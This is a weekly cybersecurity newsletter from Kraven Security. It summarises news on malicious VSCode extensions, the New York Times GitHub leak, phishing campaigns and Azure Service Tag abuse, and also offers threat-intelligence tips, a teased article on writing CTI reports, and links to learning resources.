Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Malicious VSCode Extensions Downloaded Over a Million Times
Israeli researchers discovered extensions in the Visual Studio Code Marketplace, including a trojanized ‘Dracula Official’ theme, that collected system information and sent it to a remote server.
Top 3 takeaways:
- The VSCode marketplace was found to host thousands of extensions with millions of installs that pose security risks, such as hardcoded IP addresses and unknown executables.
- The lack of stringent controls and code reviewing mechanisms in the marketplace allows for rampant abuse, posing a direct threat to organizations.
- The researchers plan to release their ‘ExtensionTotal’ tool to help developers scan for threats. They have also reported all malicious extensions to Microsoft for removal.
Exposed GitHub Token Leads to Leak of New York Times Source Code
The New York Times confirmed a data leak after internal source code and data were stolen from its GitHub repositories and posted on the anonymous message board 4chan.
Top 3 takeaways:
- An anonymous user leaked a 273GB archive containing approximately 3.6 million files and 5,000 repositories, including the source code for the Wordle game.
- The breach was executed using an exposed GitHub token, allowing unauthorized access to the company’s code repositories.
- The New York Times stated that the breach did not affect its internal corporate systems or operations, and it has taken measures to monitor for anomalous activity.
- This incident highlights the importance of securing credentials and continuous monitoring for potential security breaches.
Phishing Attacks Target Recruiters With Malicious Resumes
A recent phishing attack distributed the More_eggs malware by pretending to be a resume, targeting recruiters in the industrial services industry.
Top 4 takeaways:
- The malware, linked to the Golden Chickens threat actor, uses social engineering to lure victims into downloading malicious files via fake job applications on LinkedIn.
- The attack involves a fake resume download site that delivers a Windows Shortcut file. The shortcut file retrieves a malicious DLL to establish persistence and deploy the More_eggs backdoor.
- Similar social engineering campaigns have been seen recently impersonating legitimate software, such as the V3B phishing kit targeting European banking customers and fake websites distributing the Vidar Stealer malware.
- Attacks like this are expected to rise in popularity as advanced capabilities, such as interacting with victims in real time and stealing their OTP, PhotoTAN codes, and QR code jacking, become more common.
Microsoft Azure Service Tags Can Be Abused by Hackers
Microsoft has issued a warning about the potential misuse of Azure Service Tags by hackers to bypass firewall rules and access cloud resources unauthorizedly.
Top 4 takeaways:
- Cybersecurity firm Tenable discovered that Azure customers relying on Service Tags for firewall rules could be vulnerable to bypassing.
- At least 10 Azure services, including Azure Application Insights and Azure DevOps, are susceptible to this vulnerability.
- Customers are advised to review their use of service tags and implement adequate security measures to authenticate trusted network traffic.
- This vulnerability highlights the importance of not solely relying on service tags as a security measure and the need for proper validation controls.
New Phishing Campaign Exploits Windows Search Protocol
A new phishing campaign abuses the Windows search protocol to deliver malware via HTML attachments disguised as invoices.
Top 3 takeaways:
- Attackers exploit the search-ms URI to perform searches on remote servers, potentially sharing malicious files.
- The HTML file automatically opens a malicious URL or provides a clickable link as a fallback, leading to a remote host search.
- Trustwave suggests deleting registry entries associated with the search-ms/search URI protocol to prevent such attacks.
Top Tips of the Week
Threat Intelligence
- Regularly assess the effectiveness of your CTI. Measure its impact on security posture and adjust strategies accordingly.
- Utilize threat intelligence for risk assessment. Identify and prioritize potential risks to allocate resources more effectively.
- Foster a CTI community within your organization. Share insights, experiences, and best practices among CTI practitioners.
Threat Hunting
- Integrate threat intelligence with SOAR platforms. Streamline workflows for efficient threat detection and response.
- Implement threat intelligence in incident response in cyber threat hunting. Proactive measures are as crucial as swift and effective responses.
Custom Tooling
- Consider open-source frameworks for custom tool development. Leverage existing resources to expedite the creation process.
- Create custom tools with a focus on data visualization. Enhance user understanding and decision-making through clear and insightful data representation.
Feature Article
Cyber threat intelligence (CTI) reports are essential for every organization. They allow you to assess emerging threats, prioritize resources, and proactively defend yourself. As a cyber security professional, you must know how to write one and be good at CTI report writing.
This guide will teach you how to write a CTI report, what you must include, and showcase a simple writing process you can follow so you don’t get stuck with writer’s block. It will also highlight best practices for CTI report writing so you can start producing high-quality reports today!
Let’s start by first understanding why CTI report writing is important and the benefits good reports can bring to an organization.
Learning Resources
Domain Takeover With PowerShell Remoting
PowerShell Remoting is a native Windows feature that can be used to take over entire enterprises. It allows you to pivot between machines, automate hacking tasks, and dominate Windows environments while remaining undetected.
This comprehensive guide will teach you about PowerShell Remoting and how to use it to start interactive sessions, execute remote commands, and run complete PowerShell scripts against multiple machines.
You’ll also see how it can be used for common penetration testing actions like lateral movement, privilege escalation, and establishing persistence while evading detection.
Cyber Threat Intelligence Fallacies
Discover common cyber threat intelligence (CTI) fallacies in this awesome presentation by Andy Piazza, head of threat intelligence at IBM X-Force. He critiques the overemphasis on intent and capabilities, the misuse of threat actor profiles, and the pitfalls of threat feeds.
Andy emphasizes the importance of clear communication, critical thinking, and understanding the context of intelligence reports to avoid biases and misinterpretations.
How to Build an Audience With Digital Writing
I am a strong proponent of digital writing and its many benefits, especially for cyber security. This excellent video by Nicholas Cole discusses the best digital writing platforms to build an audience in 2024, emphasizing social platforms over personal blogs.
He explains why writing on social platforms is the best way to build an audience, how to create a content creation strategy, and how to get started.
Apple Announces Its Generative AI
Apple announced its new generative AI, Apple Intelligence, at the WWDC conference. This summary from CNET highlights the technology’s features and limitations, its integration with devices like iPhones and iPads, and the potential for future expansion.
Apple Intelligence will enhance Siri, assist with writing, and offer new photo and emoji generation capabilities. The company’s approach to privacy, which focuses on secure, private data handling through private cloud computing, is also discussed.
Personal Notes
🤔 This week at Kraven, we have been focused on building two new series. One, which I hinted at last week, focuses on cyber threat intelligence (CTI) biases, and another discusses the various data collection sources. We are excited to add to these two series in the coming weeks because each is fundamental to good threat intelligence work.
We have also been playing around with several new CTI tools, such as Flowintel-cm, ATT&CK Powered Suit, and ATT&CK Navigator, on which we hope to release articles soon. Mastering tools is essential to raising your and your team’s productivity.
As always, have a fantastic weekend, and enjoy the learning resources provided!
